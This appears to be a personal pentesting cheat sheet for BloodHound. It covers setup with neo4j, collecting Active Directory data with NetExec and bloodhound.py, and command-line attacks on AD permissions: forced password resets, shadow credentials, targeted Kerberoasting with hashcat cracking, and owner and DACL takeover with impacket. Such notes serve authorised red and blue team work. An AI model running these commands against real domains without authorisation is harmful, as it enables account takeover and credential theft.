Bloodhound

Bloodhound CheatSheet

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

1.0 Installation

apt install bloodhound

2.0 Configuration

neo4j console
2025-01-03 14:44:26.560+0000 INFO  Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO  Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO  id:

Connect to http://localhost:7474/ and change default password from neo4j:neo4j to something better.

3.0 Usage

Run with:

bloodhound

3.1 Collect AD Data

3.1.1 NetExec

nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip

3.1.2 bloodhound.py

git clone https://github.com/dirkjanm/BloodHound.py

# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip

# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass

3.2 Attribute Attacks

3.2.1 ForceChangePassword

net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'

3.2.2 GenericAll

Manipulate msDs-KeyCredentialLink and request TGT:

pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass

Afterwards, crack the hash with:

`hashcat -m 13100 file.hash /lists/pass.file`

3.2.3 GenericWrite

3.2.4 WriteOwner

Set the controlled user as the object owner:

impacket-owneredit -action write -new-owner 'ControlledUser' -target 'TargetObject' '$domain/$ControlledUser:$Pass'

Afterwards gain FullControl rights for the object:

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ControlledUser' -target 'TargetObject' '$domain/$ControlledUser:$Pass'

At this point, try [[CRD - Shadow Credentials]] to get the Object NTLM Hash, instead of changing the password.

4.0 Hints

• Mark all owned users as owned!
• Select user and check AD permissions
  • Node info
  • Transitive Object Control
  • local admin

4.1 Custom Queries

git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader

4.2 Neo4j Database Queries

4.2.1 Create new database

create database newdb

4.2.2 Seitch database

:use newdb

5.0 References

• Github: BloodHound
• iRed: Bloodhound with Kali Linux 101
• iRed: neo4j

6.0 Tags

• #OS/Kali
• #Label/CheatSheet
• #public